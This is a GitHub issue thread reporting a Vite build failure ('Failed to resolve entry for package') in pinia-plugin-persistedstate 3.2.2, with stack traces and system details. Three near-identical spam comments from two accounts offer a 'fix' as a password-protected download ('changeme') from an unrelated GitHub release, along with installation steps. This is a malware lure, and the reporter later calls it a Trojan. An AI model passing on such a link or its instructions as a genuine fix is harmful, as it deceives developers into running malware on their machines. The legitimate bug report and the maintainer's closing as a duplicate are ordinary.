### ISSUE TITLE
[commonjs--resolver] Failed to resolve entry for package "pinia-plugin-persistedstate".

### ISSUE THREAD

**Issue by P2K0** [prazdevs/pinia-plugin-persistedstate#323] opened 2024-08-29 01:08 UTC
### Are you using Nuxt?

- [ ] Check this box if you encountered the issue using Nuxt and the included module.

### Describe the bug

When I have used pinia-plugin-persistedstate@3.2.1 He works for me
3.2.1 demo  https://stackblitz.com/edit/vitejs-vite-jcktpk?file=package.json

When I have used pinia-plugin-persistedstate@3.2.2 It will report an error
3.2.2 demo https://stackblitz.com/edit/vitejs-vite-x9ywdl?file=package.json

```bash
+ pinia-plugin-persistedstate 3.2.2 (4.0.0-alpha.4 is available)

✓ 17 modules transformed.
[commonjs--resolver] Failed to resolve entry for package "pinia-plugin-persistedstate". The package may have incorrect main/module/exports specified in its package.json.
error during build:
Error: Failed to resolve entry for package "pinia-plugin-persistedstate". The package may have incorrect main/module/exports specified in its package.json.
    at packageEntryFailure (file:///usr/local/lib/node_modules/vite/dist/node/chunks/dep-Pluk1iaB.js:29448:17)
    at resolvePackageEntry (file:///usr/local/lib/node_modules/vite/dist/node/chunks/dep-Pluk1iaB.js:29445:5)
    at tryNodeResolve (file:///usr/local/lib/node_modules/vite/dist/node/chunks/dep-Pluk1iaB.js:29215:20)
    at Object.resolveId (file:///usr/local/lib/node_modules/vite/dist/node/chunks/dep-Pluk1iaB.js:28983:28)
    at file:///usr/local/lib/node_modules/vite/node_modules/rollup/dist/es/shared/node-entry.js:18637:40
    at async PluginDriver.hookFirstAndGetPlugin (file:///usr/local/lib/node_modules/vite/node_modules/rollup/dist/es/shared/node-entry.js:18537:28)
    at async resolveId (file:///usr/local/lib/node_modules/vite/node_modules/rollup/dist/es/shared/node-entry.js:17206:26)
    at async ModuleLoader.resolveId (file:///usr/local/lib/node_modules/vite/node_modules/rollup/dist/es/shared/node-entry.js:17620:15)
    at async Object.resolveId (file:///usr/local/lib/node_modules/vite/dist/node/chunks/dep-Pluk1iaB.js:8141:10)
    at async PluginDriver.hookFirstAndGetPlugin (file:///usr/local/lib/node_modules/vite/node_modules/rollup/dist/es/shared/node-entry.js:18537:28)
    at async resolveId (file:///usr/local/lib/node_modules/vite/node_modules/rollup/dist/es/shared/node-entry.js:17206:26)
    at async ModuleLoader.resolveId (file:///usr/local/lib/node_modules/vite/node_modules/rollup/dist/es/shared/node-entry.js:17620:15)
    at async file:///usr/local/lib/node_modules/vite/node_modules/rollup/dist/es/shared/node-entry.js:17927:50
```

### Reproduction

https://stackblitz.com/edit/vitejs-vite-x9ywdl?file=package.json

### System Info

```Shell
System:
    OS: Windows 11 10.0.22631
    CPU: (12) x64 Intel(R) Core(TM) i5-10400 CPU @ 2.90GHz
    Memory: 15.22 GB / 31.75 GB
  Binaries:
    Node: 20.17.0 - ~\AppData\Local\fnm_multishells\8968_1724892197053\node.EXE
    Yarn: 1.22.22 - ~\AppData\Local\fnm_multishells\8968_1724892197053\yarn.CMD
    npm: 10.8.2 - ~\AppData\Local\fnm_multishells\8968_1724892197053\npm.CMD
    pnpm: 9.9.0 - ~\AppData\Local\fnm_multishells\8968_1724892197053\pnpm.CMD
  Browsers:
    Edge: Chromium (100.0.1185.36)
    Internet Explorer: 11.0.22621.3527
```

### Used Package Manager

pnpm

### Validations

- [X] Follow our [Code of Conduct](https://github.com/prazdevs/pinia-plugin-persistedstate/blob/main/CODE_OF_CONDUCT.md)
- [X] Read the [Contributing Guide](https://github.com/prazdevs/pinia-plugin-persistedstate/blob/main/CONTRIBUTING.md).
- [X] Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
- [X] The provided reproduction is a [minimal reproducible](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by louseee** [comment] 2024-08-29 01:09
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment] 2024-08-29 01:11
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment] 2024-08-29 01:29
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by P2K0** [comment] 2024-08-29 01:39
I found that when I created an issue, a few people commented and gave a Trojan program. I forgot to keep a screenshot

https://github.com/Jostino
https://github.com/robykartis

**Comment by prazdevs** [comment] 2024-08-29 02:36
duplicate of #322

**Closed by prazdevs** 2024-08-29 02:36 UTC
Labels: 🔍️ pending triage
